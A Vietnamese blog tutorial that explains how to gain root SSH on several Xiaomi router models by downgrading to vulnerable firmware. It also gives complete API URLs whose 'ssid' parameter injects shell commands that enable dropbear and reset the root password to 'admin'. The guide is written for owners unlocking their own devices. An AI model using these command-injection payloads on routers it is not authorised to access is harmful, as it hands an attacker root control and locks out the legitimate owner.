Hướng dẫn mở khoá SSH các loại router Xiaomi trên FW gốc

0. Phiên bản Firmware tồn tại lỗ hổng

ModelVersion
AX36001.0.17 -
AX18001.0.34 - / 1.0.328 - / 1.0.336 -
AX51.0.16 - / 1.0.26 -
AC21002.0.722 -

1. Downgrade Firmware

 • Để OpenSSH, trước tiên phải Hạ cấp FW xuống phiên bản thấp hơn để lợi dụng lỗ hổng của FW.
  • Đăng nhập trang quản lý Router > Downgrade về phiên bản tồn tại lỗ hổng đã nêu ở mục 0
    screenshot

   Downgrade Miwifi 0 Downgrade Miwifi 1

  • Router sẽ tự reboot sau khi Downgrade

2. OpenSSH

 • Sau khi router Reboot, đăng nhập vào lại trang quản lý router. Để ý URL sẽ có dạng
  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/web/home#router
 • Chỉnh sửa lại phần sau của URL tương tự như sau (để nguyên phần stok=xxx)
  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B
 • Nhấn Enter, màn hình hiện {"code":0} thì tiến hành bước 2.
  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

Đăng nhập SSH với username là root

 • Lấy mật khẩu root qua số SN

Nhập vào mã SN có dạng: 12345/A1BC23456 vào trường bên dưới và nhấn Calculate

SN phân biệt chữ HOA chữ thườngkhông chứa khoảng trắng (dấu cách)


Nhấn nút Copy để sao chép Password được tạo.
 • Hoặc chạy URL để đổi mật khẩu root thành admin (root/admin)
  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B


Nguồn tham khảo: https://www.right.com.cn/ -
Mọi thắc mắc vui lòng để lại bình luận
Chúc các bạn thành công

author

Nghia Phan

Mọi ý kiến đóng góp hoặc thắc mắc, cứ thoải mái liên hệ với mình qua các kênh mạng xã hội dưới đây. CÁM ƠN CÁC BẠN ĐÃ ĐỌC và CHÚC CÁC BẠN MỘT NGÀY TỐT LÀNH 😉.

Previous Post Next Post